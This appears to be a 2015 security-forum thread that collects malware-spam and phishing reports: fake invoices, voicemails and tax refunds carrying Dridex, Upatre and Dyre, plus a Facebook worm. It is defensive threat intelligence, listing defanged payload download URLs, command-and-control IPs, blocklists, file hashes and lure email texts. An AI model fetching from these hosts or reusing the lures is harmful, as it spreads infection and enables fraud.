Current Virus total detections: 3/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/5a1467e9341ca5cf295fd84d76fcc38f7faccd573dbe6e872149eee64d26a9dc/analysis/1426081018/
... Behavioural information
TCP connections
216.146.39.70: https://www.virustotal.com/en/ip-address/216.146.39.70/information/
95.181.53.78: https://www.virustotal.com/en/ip-address/95.181.53.78/information/
209.126.254.152: https://www.virustotal.com/en/ip-address/209.126.254.152/information/
185.30.40.44: https://www.virustotal.com/en/ip-address/185.30.40.44/information/
88.221.14.249: https://www.virustotal.com/en/ip-address/88.221.14.249/information/
UDP communications
134.170.185.211: https://www.virustotal.com/en/ip-address/134.170.185.211/information/
74.125.204.127: https://www.virustotal.com/en/ip-address/74.125.204.127/information/
___
Fake Voicemail SPAM - malicious attachment
- http://blog.dynamoo.com/2015/03/malware-spam-voicemail-message.html
11 Mar 2015 - "When was the last time someone sent you a voice mail message by email? Never? There are no surprises to find that this spam email message has a malicious attachment.
From: Voicemail admin@ victimdomain
Date: 11/03/2015 11:48
Subject: Voicemail Message (07813297716) From:07813297716
IP Office Voicemail redirected message
Attachment: MSG00311.WAV.ZIP
The attachment is a ZIP file containing a malicious EXE file called MSG00311.WAV.exe which has a VirusTotal detection rate of 5/57*. According to the Malwr report, it pulls down another executable and some config files from:
http ://wqg64j0ei .homepage.t-online .de/data/log.exe
http ://cosmeticvet .su/conlib.php
This behaviour is very much like a Dridex downloader, a campaign that has mostly been using malicious macros rather than EXE-in-ZIP attacks.
The executable it drops has a detection rate of 2/54**... Malwr reports ... show a further component download from:
http ://muscleshop15 .ru/js/jre.exe
http ://test1.thienduongweb .com/js/jre.exe
This component has a detection rate of 5/57***. According to the Malwr report for that we see (among other things) that it drops a DLL with a detection rate of 4/57**** which is the same Dridex binary we've been seeing all day. Piecing together the IP addresses found in those reports combined with some information from one of my intelligence feeds, we can see that the following IPs are involved in this activity:
... Recommended blocklist:
31.41.45.211
62.213.67.115
80.150.6.138
42.117.1.88
188.225.77.242
212.224.113.144
37.59.50.19
62.76.179.44
95.163.121.0/24
185.25.150.3
104.232.32.119
188.120.243.159 "
* https://www.virustotal.com/en/file/205201a73bd0253b4b3b99640cfed9452e049c026a94b11e6ae0a3e3de0e34c9/analysis/1426091260/
** https://www.virustotal.com/en/file/e4de1d084bee03cc2c32f0debfbea477b1c5caa1edfe5845505585d8620937a2/analysis/1426091556/
*** https://www.virustotal.com/en/file/17abe560509c0ddb1c1e43a4ddd93539142a59dc3b347c90644027d93de27e30/analysis/1426092316/
**** https://www.virustotal.com/en/file/56982e69221e8d1ba0ab856a4891f579a4de92d0faabdcec06da38dd784d8a93/analysis/1426093429/
:fear: :mad:
AplusWebMaster
2015-03-12, 14:29
FYI...
Fake Invoice SPAM - doc or xls malware
- http://myonlinesecurity.co.uk/invoice-random-for-payment-to-word-doc-or-excel-xls-spreadsheet-malware/
12 Mar 2015 - "'Invoice [random numbers] for payment to <random company>' coming from random names and companies with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... This email has what appears to be a genuine word doc or Excel XLS spreadsheet attached which is malformed and contains a macro script virus... The email has a totally blank-body and just a word or excel attachment with a random name...
11 March 2015 : 6780MHH.doc - Current Virus total detections: 0/56*
... which connects to & downloads https ://92.63.88.102 /api/gb1.exe which in turn is saved as %temp%\dsfsdfsdf.exe (virus total**). So far I am only seeing 1 version of this malware, but previous campaigns over the last few weeks have delivered 2 or 3 different versions, some with word doc attachments and some with Excel xls attachments... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/1b0ab691ac932688ebb7745248bdc4e14e16db2e6cd283c1bb860d26c4ef8954/analysis/1426151513/
** https://www.virustotal.com/en/file/2660007dca7c1a19f5e0da9eceb1daa64e12c59f93251f9d79f9bb95087d9a57/analysis/1426156982/
... Behavioural information
TCP connections
95.163.121.33: https://www.virustotal.com/en/ip-address/95.163.121.33/information/
92.63.88.102: https://www.virustotal.com/en/ip-address/92.63.88.102/information/
- http://blog.dynamoo.com/2015/03/malware-spam-invoice-1234xyz-for.html
12 March 2015
"...Recommended blocklist:
95.163.121.0/24
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
85.143.166.0/24 "
___
Fake Voicemail SPAM - malware
- http://myonlinesecurity.co.uk/you-have-received-a-voice-mail-malware/
12 Mar 2015 - "'You have received a voice mail' pretending to come from Voicemail Report <no-reply@ voicemail-delivery .com> with a zip attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/You-have-received-a-voice-mail.png
12 March 2015: VOICE8411-263-481.zip: Extracts to: VOICE8411-263-481.scr
Current Virus total detections: 5/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper sound file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/2328d042ec6293a85cf5beb00edd5cc0d8ff7dc5f426fe6f167e98cb87c8b376/analysis/1426165959/
___
Facebook Worm variant leverages Multiple Cloud Services
- https://blog.malwarebytes.org/fraud-scam/2015/03/new-facebook-worm-variant-leverages-multiple-cloud-services/
Mar 12, 2015 - "... We came across a worm that we think belongs to the -Kilim- family and whose purpose is to compromise a user and spread via Facebook. The lure is the promise of pornographic material that comes as what appears to be a video file named Videos_New.mp4_2942281629029.exe, which in reality is a malicious program. Once infected, the victim spreads the worm to all of his contacts and groups that he belongs to... The bad guys have built a multi-layer redirection architecture that uses the ow.ly URL shortener, Amazon Web Services and Box.com cloud storage.
> https://blog.malwarebytes.org/wp-content/uploads/2015/03/flow.png
... We identified three domains involved in the configuration and update mechanism for the worm:
- videomasars .healthcare | Enom, whoisguard Protected, Panama | 91.121.114.211 | PVH AS16276 OVH
- porschealacam .com | Enom, whoisguard Protected, Panama | 91.121.114.211 | PVH AS16276 OVH
- hahahahaa .com | Enom, whoisguard Protected, Panama |AS13335 CLOUDFLARENET
... This is a malicious file (Trojan) hosted on the popular cloud storage Box. Malwarebytes Anti-Malware detects it as Trojan.Agent.ED (VirusTotal link*). This binary is responsible for downloading additional resources (the worm component) from another resource (porschealacam .com). Here we find a malicious Chrome extension (VirusTotal link**) and additional binaries (scvhost.exe*** and son.exe****). Additional code is retrieve by the piece of malware (perhaps in case the user does not have the Chrome browser) from a third site, hahahahaa .com, to spread the worm via Facebook ... a rogue Chrome extension is injected but that is not all. The malware also creates a shortcut for Chrome that actually launches a malicious app in the browser directly to the Facebook website... In this ‘modified’ browser, attackers have full control to capture all user activity but also to restrict certain features. For example, they have disabled the extensions page that once can normally access by typing chrome://extensions/, possibly in an attempt to -not- let the user disable or remove the malicious extension. Clearly, the crooks behind this Facebook worm have gone to great lengths to anonymize themselves but also to go around browser protection by creating their own booby-trapped version.
We have reported the various URLs to their respective owners and some have already been shutdown. However, we still urge caution before clicking on any link that promises free prizes or sensational items. Once again the bad guys are leveraging human nature and while we do not know how many people fell for this threat, we can guess that it most likely affected a significant number of Facebook users."
(More detail at the malwarebytes URL above.)
* https://www.virustotal.com/en/file/66973c39d0babe54392cea08c20438dbe70c15602ed9c25a644df6a1d17a06e2/analysis/1426093312/
** https://www.virustotal.com/en/file/70a299b0a62b6b1291aac4d01b238ec0e12203e445f936cf9126d6d6722232de/analysis/1426051972/
*** https://www.virustotal.com/en/file/6c2d98225ff41559947adcf2bc780616cf694d584a49dfed65a614a98fcf6d4c/analysis/1426093308/
**** https://www.virustotal.com/en/file/4373ef1d11f3c4711774a3891b221e6851bb227a89726c7d82e68b0f3a825ab7/analysis/1426093310/
91.121.114.211: https://www.virustotal.com/en/ip-address/91.121.114.211/information/
:fear: :mad:
AplusWebMaster
2015-03-13, 15:40
FYI...
Malware targets home networks/router
- https://isc.sans.edu/diary.html?storyid=19463
2015-03-13 - "Malware researchers at Trend Micro* have analyzed a malware that connects to the home routers and scan the home network then send the gathered information to C&C before deleting itself. TROJ_VICEPASS.A** pretends to be an Adobe Flash update, once it's run it will attempt to connect to the home router admin council using a predefined list of user names and passwords. If it succeeds, the malware will scan the network for connected devices. The malware scans for devices using HTTP, with a target IP range of 192.168.[0-6].0-192.168.[0-6].11 - this IP range is hard-coded. Once the scans finish it will encode the result using Base64 and encrypt it using a self-made encryption method. The encrypted result will be sent to a C&C server via HTTP protocol. After sending the results to the Command and Control server (C&C), it will delete itself from the victim’s computer... Such type of malware infection can be avoided using very basic security techniques such as downloading updated software from trusted sources only and changing the default password."
* http://blog.trendmicro.com/trendlabs-security-intelligence/malware-snoops-through-your-home-network/
Mar 9, 2015 - "... We recently came across one malware, detected as TROJ_VICEPASS.A**, which pretends to be an Adobe Flash update. Once executed, it attempts to connect to the home router to search for connected devices. It then tries to log in to the devices to get information. Should it be successful, it will send the information to a command-and-control (C&C) server and deletes itself from the computer:
Infection chain:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/03/vicepass1.png
Users may encounter this malware when visiting suspicious or malicious sites hosting a supposed Flash update...
Site hosting fake Adobe Flash update:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/03/vicepass2.png
Fake Flash update:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/03/vicepass3.png
Once the malware is executed, it attempts to connect to the connected router through its admin console, using a predefined list of user names and passwords. If successful, the malware will attempt to scan the network to look for connected devices... The malware scans for devices using HTTP, with a target IP range of 192.168.[0-6].0-192.168.[0-6].11, which are IP addresses which are assigned by home routers. The target range is hard-coded. A look at the internal log format reveals such:
Find router IP address – start
Searching in 192.168.0.0 – 192.168.0.11
[0] connect to 192.168. 0.0
URL: ‘192.168.0.0’, METHOD: ‘1’, DEVICE: ‘Apple’
…. (skip)
Find router IP address – end
We noticed that the malware checks for Apple devices such as iPhones and iPads, even though those devices cannot have an HTTP open panel. However, it should be noted that the strings focus more on routers..."
(More detail at the trendmicro URLs include usernames and passwords.)
** http://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_vicepass.a
___
Fake Invoice SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/penta-foods-invoice-2262004-word-doc-or-excel-xls-spreadsheet-malware/
13 Mar 2015 - "'Penta Foods Invoice: 2262004' pretending to come from cc446@ pentafoods .com with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Please find attached invoice : 2262004
Any queries please contact us.
—
Automated mail message produced by DbMail.
Registered to Penta Foods, License MBA2009357.
13 March 2015 : R-1179776.doc - Current Virus total detections: 0/56*
So far I am only seeing 1 version of this malware, but previous campaigns over the last few weeks have delivered 2 or 3 different versions, some with word doc attachments and some with Excel xls attachments... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/b4c6e800cd3d908ae316c6186ca7758d71400ad0c120814f844d3e4764b1e90a/analysis/1426236749/
- http://blog.dynamoo.com/2015/03/malware-spam-pentafoodscom-invoice.html
13 Mar 2015
"... Recommended blocklist:
62.76.179.44
212.69.172.187
78.129.153.12 "
___
More Fake Invoice SPAM - malware
- http://blog.dynamoo.com/2015/03/malware-spam-invoice-13032015-for.html
13 March 2015 - "There is a -series- of malware spams in progress in the following format:
Invoice (13\03\2015) for payment to JUPITER PRIMADONA GROWTH TRUST
Invoice (13\03\2015) for payment to CARD FACTORY PLC
Invoice (13\03\2015) for payment to CELTIC
Invoice (13\03\2015) for payment to MIRADA PLC
Note the use of the backslash in the date. There is an attachment in the format 1234XYZ.doc which I have seen three different variants of (although one of those was zero length), one of which was used in this spam run[1] yesterday and one new one with zero detections* which contains (a) malicious macro, which downloads another component from:
http ://95.163.121.186 /api/gbb1.exe
This is saved as %TEMP%\GHjkdfg.exe ... this server is wide open and is full of data and binaries relating to the Dridex campaign. Unsurprisingly, it is hosted on a Digital Networks CJSC aka DINETHOSTING IP address. This binary has a detection rate of 3/53** and the Malwr report shows it phoning home to 95.163.121.33 which is also in the same network neighbourhood. The binary also drops a malicious Dridex DLL with a detection rate of 5/56***. This is the same DLL as used in this spam run[2] earlier today.
Recommended blocklist:
95.163.121.0/24 "
* https://www.virustotal.com/en/file/475aa057202c98a0eab161e1d073390b34312565f98efb6c527c01791805523b/analysis/1426257108/
** https://www.virustotal.com/en/file/11b73915e64b4228f91fbb716bb3080252786df56d01bd6d0e7a4983375bfc1d/analysis/1426254512/
*** https://www.virustotal.com/en/file/2a79def8a3dc491729cecef3d9a5e8cb397126b1f84004dd6839321d4c60f7d0/analysis/1426257698/
1] http://blog.dynamoo.com/2015/03/malware-spam-invoice-1234xyz-for.html
2] http://blog.dynamoo.com/2015/03/malware-spam-pentafoodscom-invoice.html
95.163.121.186: https://www.virustotal.com/en/ip-address/95.163.121.186/information/
95.163.121.33: https://www.virustotal.com/en/ip-address/95.163.121.33/information/
___
Upatre update: infection chain and affected countries
- http://blogs.technet.com/b/mmpc/archive/2015/03/12/upatre-update-infection-chain-and-affected-countries.aspx
12 Mar 2015 - "... Detection rates for these countries is as follows:
> http://www.microsoft.com/security/portal/blog-images/a/UpatreTable.jpg "
:fear::fear: :mad:
AplusWebMaster
2015-03-14, 22:32
FYI...
Quttera - false positives everywhere
- http://blog.dynamoo.com/2015/03/quttera-fails-and-spews-false-positives.html
14 Mar 2015 - "By chance, I found out that my blog had been blacklisted by Quttera[1]. No big deal, because it happens from time-to-time due to the nature of the content on the site. But I discovered that it isn't just my blog, but Quttera also blocks industry-leading sites such as Cisco*, VMWare, Sophos, MITRE, AVG and Phishtank...
* https://1.bp.blogspot.com/-6AZV_319Lzk/VQRq32vUhyI/AAAAAAAAGTo/d2J1zYeeLiQ/s1600/cisco-blacklist.png
... Now, you can ask Quttera to unblacklist your site for -free- by raising a ticket[2] but the most prominent link leads to a paid service for £60/year. Hmmm.
> https://4.bp.blogspot.com/-GI6AAyGmRv8/VQRri4mf-uI/AAAAAAAAGTw/FoO4vU0dSuY/s1600/quttera.png
I don't think that I will rush to subscribe to that. Obviously, something is seriously wrong with the algorithm in use, some of these sites should obviously be whitelisted. Quttera also doesn't understand the different between a malicious domain or IP being mentioned and such a site being linked to or injected into a site. I guess there are many, many more domains that are in a similar situation. Perhaps you might want to check your own web properties and share your findings in the comments..."
1] http://www.quttera.com/
2] https://helpdesk.quttera.com/open.php
:fear::fear:
AplusWebMaster
2015-03-16, 15:31
FYI..
Fake Invoice SPAM - PDF malware
- http://myonlinesecurity.co.uk/credit-89371-james-kernohan-sons-malware/
16 Mar 2015 - "'CREDIT 89371' pretending to come from JamesKernohanandSons <jkernohans62244@ hotmail .com> with a zip attachment is supposed to be another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/CREDIT-89371.png
... Update: ... the attached word doc is malicious... It connects to 212.143.213.133 /content/js/bin.exe (Virus Total*)... Further update: ... some copies of this email have the -same- malware attachment as Attached invoice from CMP – fake PDF malware**..."
* https://www.virustotal.com/en/file/1227f0530f3b1cde2d62e9b5ee17825c88edb3617df456a490878a20a5a605b5/analysis/1426502722/
212.143.213.133: https://www.virustotal.com/en/ip-address/212.143.213.133/information/
** http://myonlinesecurity.co.uk/attached-invoice-from-cmp-fake-pdf-malware/
16 Mar 2015 - "'Attached invoice from CMP' pretending to come from noreply@ cmpireland .com with a zip attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/Attached-invoice-from-CMP.png
16 March 2015: ICI151586.PDF.ZIP: Extracts to: INVOICE_89371.PDF.exe - Current Virus total detections: 9/57*
Update: Also getting word doc attachments - ICI151586.DOC - Current Virus total detections: 2/57**
(... same malware payload as CREDIT 89371 James Kernohan & Sons – malware... Confirmed as -same- payload although from a different download location 03740b7.netsolhost .com/js/bin.exe which is saved as %temp%\lUtsca32.exe (virus total***) . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/8191ea044f87d916804034ae5171da678406eaff079a89f895050efae3913d2f/analysis/1426499520/
** https://www.virustotal.com/en/file/db3e6308564335022e38de73bdf6357e9879a0cc6af05d8aac33e7cc62b6a96a/analysis/1426502121/
*** https://www.virustotal.com/en/file/1227f0530f3b1cde2d62e9b5ee17825c88edb3617df456a490878a20a5a605b5/analysis/1426503751/
208.91.197.128: https://www.virustotal.com/en/ip-address/208.91.197.128/information/
___
Fake 'Receipt' SPAM - PDF malware
- http://myonlinesecurity.co.uk/successful-receipt-of-online-submission-for-reference-5071910-fake-pdf-malware/
16 Mar 2015 - "'Successful Receipt of Online Submission for Reference 5071910' [random reference numbers] pretending to come from noreply@ hmrc .gov .uk with a zip attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/Successful-Receipt-of-Online-Submission-for-Reference-5071910.png
16 March 2015: Ref_5071910.zip: Extracts to: Ref_AN004LO87.scr
Current Virus total detections: 6/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/ca6088c53e1d33fa733b85d330a1cc3f84c474b881cc81613ade14e8615339ae/analysis/1426509399/
___
Fake 'Outstanding Invoices' SPAM - doc malware
- http://myonlinesecurity.co.uk/outstanding-invoices-word-doc-or-excel-xls-spreadsheet-malware/
16 Mar 2015 - "'Outstanding invoices – 672751 February' pretending to come from random names and email addresses with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Dear Sirs,
Kindly find attached our reminder and copy of the relevant invoices.
Looking forward to receive your prompt payment and thank you in advance.
Kind regards
Tania Sosa
16 March 2015 : 672751.doc - Current Virus total detections: 0/56*
... previous campaigns over the last few weeks have delivered 2 or 3 different versions, some with word doc attachments and some with Excel xls attachments... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/f161b30d5b183121e0bb2511efbfd08d11851d1bc693c1014a4f75b5c1640c9f/analysis/1426514043/
:fear: :mad:
AplusWebMaster
2015-03-17, 15:57
FYI...
Fake Invoice SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/invoice-from-linsen-parts-ltd-word-doc-or-excel-xls-spreadsheet-malware/
17 Mar 2015 - "'Invoice from Linsen Parts Ltd pretending to come from Linsen Parts UK Ltd <mark62618@ linsenparts .co.uk> ( random numbers after mark) with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/Invoice-from-Linsen-Parts-Ltd.png
17 March 2015 : Invoice-3709.doc Current Virus total detections: 2/57* | 2/57** | 2/57*** which downloads from piotrkochanski .cba.pl/js/bin.exe (and other locations) and is a dridex banking Trojan (VirusTotal)[4].
I am seeing 3 versions of this malware, but previous campaigns over the last few weeks have delivered 3, 4 or even more different versions, some with word doc attachments and some with Excel xls attachments... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/84ed4af68f401bdf7f5470fbb4a49134a523a032919baf8610510d5e34b03268/analysis/1426579380/
** https://www.virustotal.com/en/file/24aff09953c8301e82217137001b9ed45a84a3f3a04d6ce1a875d2d36eb275fb/analysis/1426579237/
*** https://www.virustotal.com/en/file/90767466ea908631bdba5f8628c7a02aa3ceb900e0a70cd2d18c4f86f58222e7/analysis/1426580404/
4] https://www.virustotal.com/en/file/261c9cb9041becb540dea94b3eb809867a3f0296a25c24a8d300216c1cc29f7b/analysis/1426578803/
... Behavioural information
TCP connections
78.129.153.12: https://www.virustotal.com/en/ip-address/78.129.153.12/information/
UDP communications
134.170.185.211: https://www.virustotal.com/en/ip-address/134.170.185.211/information/
___
Fake 'Payment confirmation' SPAM - doc / xls malware
- http://myonlinesecurity.co.uk/payment-confirmation-abl104-word-doc-or-excel-xls-spreadsheet-malware/
17 Mar 2015 - "'Payment confirmation ABL104' ( random numbers) coming from random names and email addresses with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... Other subjects in today’s spam run with malicious word macro docs are:
Transaction confirmation ZLZ240 ( random numbers)
Confirmation for payment NZV088 ( random numbers)
RE:Confirmation for payment OXP504 ( random numbers)
RE:Transaction confirmation YVD711
This email has what appears to be a genuine word doc or Excel XLS spreadsheet attached which is malformed and contains a macro script virus...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/Payment-confirmation.png
17 March 2015 : ABL104.doc - Current Virus total detections: 2/55*
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/8709c28b6aab2a7f279f3f6ed1b809523b91939d90281b41bfd5ef24c2545f62/analysis/1426590334/
___
Fake 'Admin Exchange' SPAM – PDF malware
- http://myonlinesecurity.co.uk/administrator-exchange-email-fake-pdf-malware/
17 Mar 2015 - "'Administrator – Exchange Email' pretending to come from you and your domain Administrator@ ron .schorr ... with a zip attachment is another one from the current bot runs... The email pretends to come from the person it is addressed to and from your own email domain so looks like:
ron.schorr,
This attachment provides you with managing facilities for your mailboxes, public folders, distribution lists, contact and mail service general settings. Please save the attached file to your hard drive before deleting this message.
Thank you,
Administrator ...
17 March 2015: Exchange.zip: Extracts to: Exchange.scr - Current Virus total detections: 5/52*
This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/9e5664bac44970cfb8d73915df834d14d5eef369d51db6543ba9d68e6135d7a2/analysis/1426607993/
... Behavioural information
TCP connections
216.146.43.70: https://www.virustotal.com/en/ip-address/216.146.43.70/information/
109.230.131.95: https://www.virustotal.com/en/ip-address/109.230.131.95/information/
213.186.33.82: https://www.virustotal.com/en/ip-address/213.186.33.82/information/
UDP communications
77.72.174.167: https://www.virustotal.com/en/ip-address/77.72.174.167/information/
77.72.174.166: https://www.virustotal.com/en/ip-address/77.72.174.166/information/
___
Fake Wells Fargo SPAM - PDF malware
- http://myonlinesecurity.co.uk/wells-fargo-fw-customer-account-docs-fake-pdf-malware/
17 Mar 2015 - "'FW: Customer account docs' pretending to come from Carrie L. Tolstedt <Carrie.Tolstedt@ wellsfargo .com> with link to a zip attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/Customer-account-docs.png
17 March 2015: SignedDocuments.zip: Extracts to: SignedDocuments.scr
Current Virus total detections: 3/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/157158f46dc0a72c703f48d337b6f1ccd128e3f3c85ff955c435cf12f296f5a8/analysis/1426610474/
... Behavioural information
TCP connections
216.146.43.70: https://www.virustotal.com/en/ip-address/216.146.43.70/information/
109.230.131.95: https://www.virustotal.com/en/ip-address/109.230.131.95/information/
198.23.48.157: https://www.virustotal.com/en/ip-address/198.23.48.157/information/
UDP communications
134.170.185.211: https://www.virustotal.com/en/ip-address/134.170.185.211/information/
77.72.169.165: https://www.virustotal.com/en/ip-address/77.72.169.165/information/
77.72.169.164: https://www.virustotal.com/en/ip-address/77.72.169.164/information/
:fear: :mad:
AplusWebMaster
2015-03-18, 13:27
FYI...
HMRC Tax Refund - Phish ...
- http://myonlinesecurity.co.uk/hmrc-tax-refund-notification-phishing/
18 Mar 2015 - "'Tax Refund Notification' is an email pretending to come from HM Revenue & Customs. One of the major common subjects in a phishing attempt is Tax returns, where especially in UK, you need to submit your Tax Return online before 31st December each year. This one wants your personal details and your credit card and bank details. Many of them are also designed to specifically steal your email, facebook and other social network log in details... The original email looks like this, and of course at this time of year (or anytime of year) we all need a few extra pennies and the offer of a tax refund is always welcome. It will NEVER be a genuine email from HMRC so don’t ever fill in the html ( webpage) form that comes attached to the email. Some versions of this phish will have a link to a website that looks at first glance like the genuine HMRC website. That is also false. This particular email has the entire content in an image and clicking anywhere on the image leads you to http ://taxrefundid778318ok.uleconstruction .com/ which in turn sends you on to http ://refund-hmrc.uk-6159368de39251d7a-login.id-107sbtd9cbhsbtd5d80a13c0db1f546757jnq9j5754675752240566.isteksut .com/IlOyTgNjFrGtHtEwVo/indexx.php
Both urls could easily be mistaken for genuine tax refund sites when you don’t take care and only look at the first part of the url & not the entire url... If you follow the link you see a webpage looking like this where they want your email address, name and date of birth.
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/spiderspun_HMRC_phish1.png
They then pretend to do a search based on your name and email. Then you get sent on to the nitty gritty where they want all your banking and credit information. This obviously was created by a non UK person because the UK uses post codes & not zip codes, which should be an immediate alarm bell to somebody getting this far:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/fake-HMRC-tax-refund.png
All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."
___
Fake 'Confirmation' SPAM – doc / xls malware
- http://myonlinesecurity.co.uk/nwn-media-ltd-confirmation-of-booking-word-doc-or-excel-xls-spreadsheet-malware/
18 Mar 2015 - "'NWN Media Ltd Confirmation of Booking' pretending to come from della.richards4732@ nwn. co.uk <della.richards@ nwn. co.uk> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/Confirmation-of-Booking.png
18 March 2015 : NWN Confirmation Letter.doc - Current Virus total detections: 3/57* | 3/57**
One version of this malicious macro tries to download deosiibude .de/js/bin.exe (... this is currently offline and most probably removed by its host). Other download sites are www .asociacecasin .com/js/bin.exe and pmmarkt .de/js/bin.exe both downloading same malware which is saved as %temp%\frexobj86.exe ( Virus Total***). So far I am only seeing 2 versions of this malware, but previous campaigns over the last few weeks have delivered 3, 4 or even more different versions, some with word doc attachments and some with Excel xls attachments... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/75fd55da996bf800d3e6f517e1045bdf3f434768328bad344910a79fa81abead/analysis/1426671991/
** https://www.virustotal.com/en/file/4e07444af5611b7f895fa1511e7ab4109d5f0041fda494a431d8f3950b4c0c59/analysis/1426671176/
*** https://www.virustotal.com/en/file/e50011c9c5bc5abdf9bbbe402b2b8d0ffce1b1e2254f1fdea1e7d77f0a5a1385/analysis/1426674582/
- http://blog.dynamoo.com/2015/03/malware-spam-confirmation-of-booking.html
18 Mar 2015
"... Recommended blocklist:
31.41.45.211
109.234.159.250
37.59.50.19
62.76.179.44
95.163.121.0/24 "
___
Fake 'unpaid invoice' SPAM - doc / xls malware
- http://myonlinesecurity.co.uk/unpaid-invoice-notification-word-doc-or-excel-xls-spreadsheet-malware/
18 Mar 2015 - "'February unpaid invoice notification' pretending to come from numerous email addresses and names with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... Alternative subjects seen today so far are:
February unpaid invoice notification
January unpaid invoice notification
December unpaid invoice notification
This email has what appears to be a genuine word doc or Excel XLS spreadsheet attached which is malformed and contains a macro script virus... The email has a totally-blank-body with a randomly named word XML doc attachment...
18 March 2015 : 43GEB594.doc - Current Virus total detections: 0/57* | 0/57** |0/57***
So far I am seeing multiple versions of this malware... some with word doc attachments and some with Excel xls attachments... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/37e4abc58302e61c83573b83fe25a3729d35e9d6d61906624ff5f7543a3270bb/analysis/1426679613/
** https://www.virustotal.com/en/file/21a4682565fa2390f904cfa564beca82558fdef173ca776b73994751104e7948/analysis/1426679518/
*** https://www.virustotal.com/en/file/f15178cdb159fb04d8ab3fdaf7ca49943603912c0dde9b7b7f03680246b1f05b/analysis/1426679965/
- http://blog.dynamoo.com/2015/03/malware-spam-december-unpaid-invoice.html
18 Mar 2015
"... Recommended blocklist:
31.25.77.154
95.163.121.0/24
188.165.5.194
188.165.26.237
115.241.60.56
46.19.143.151
176.31.28.244 "
___
Fake 'Gateway gov' SPAM - zip/doc/rtf malware
- http://blog.dynamoo.com/2015/03/malware-spam-your-online-gatewaygovuk.html
18 Mar 2015 - "This spam leads to a malicious ZIP file hosted either on Dropbox or Cubby.
From: Gateway .gov .uk
Date: 18 March 2015 at 13:19
Subject: Your online Gateway .gov .uk Submission
Electronic Submission Gateway
Thank you for your submission for the Government Gateway.
The Government Gateway is the UK's centralized registration service for e-Government services.
To view/download your form to the Government Gateway please visit ...
This is an automatically generated email. Please do not reply as the email address is not
monitored for received mail.
gov .uk - the best place to find government services and information - Opens in new window
The best place to find government services and information
The link leads to an archive file Avis_De_Paiement.zip which in turn contains a malicious binary Avis_De_Paiement.scr which has a VirusTotal detection rate of 16/57*. ThreatExpert and Comodo CAMAS report that it downloads components from the following locations:
canabrake .com .mx/css/doc11.rtf
straphael .org .uk/youth2000_files/doc11.rtf
My sources indicate that this most likely phones home to 109.230.131.95 (Vsevnet Ltd. Russia) which is a known bad IP that I recommend -blocking. The payload appears to be the Upatre downloader leading to the Dyre banking trojan."
* https://www.virustotal.com/en/file/1b3e0b87bbb4d84c7e7b4bea5a409df7272adef9487bbe239ebbfd2be0fa60bf/analysis/1426693801/
___
Fake JP Morgan SPAM - malicious attachment
- http://myonlinesecurity.co.uk/carrie-l-tolstedt-jp-morgan-access-fw-customer-account-docs-fake-pdf-malware/
18 Mar 2015 - "'Carrie L. Tolstedt FW: Customer account docs. pretending to come from JP Morgan Access <Carrie.Tolstedt@ jpmorgan .com> with link to a zip attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/Customer-account-docs-J-P-Morgan.png
The link in the email goes once again to a cubby user content site...
17 March 2015: SignedDocuments.zip: Extracts to: SignedDocuments.scr
